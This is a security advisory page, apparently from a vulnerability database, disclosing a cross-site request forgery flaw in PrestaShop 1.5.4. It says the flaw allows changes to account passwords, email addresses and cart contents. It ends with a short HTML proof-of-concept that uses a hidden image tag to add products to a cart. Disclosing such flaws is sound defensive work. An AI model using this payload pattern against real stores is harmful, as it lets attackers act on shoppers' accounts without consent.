PrestaShop 1.5.4 Cross Site Request Forgery

2013-07-12 / 2013-07-13
Credit: EntPro
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

View online: http://demo-store.prestashop.com/en/ * Advisory ID: PRESTASHOP * Version: 1.5.4 * Date: 2013-July-11 * Security risk: Moderately critical [2] * Exploitable from: Remote * Vulnerability: Cross Site Request Forgery -------- DESCRIPTION --------------------------------------------------------- With this vulnerability, account passwords and mail adresses could be modified and also products could be added or removed remotely from the shopping cart. -------- SOLUTION ------------------------------------------------------------ There is no solution for this vulnerability at the moment. -------- REPORTED BY --------------------------------------------------------- * EntPro Cyber Security Research Group (www.entpro.com.tr) (Eyup CELYK, Ysmail SAYGILI, Gokay BEK&#222;EN, Unlu ADYOL, Yunus Emre KARABULUT) -------- EXPLOIT CODE --------------------------------------------------------- <html> <head> <body> <img src="http://localhost/language/cart?add=&id_product=[Product ID]" width=0 height=0> </body> </head> </html>

References:

http://demo-store.prestashop.com/en/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top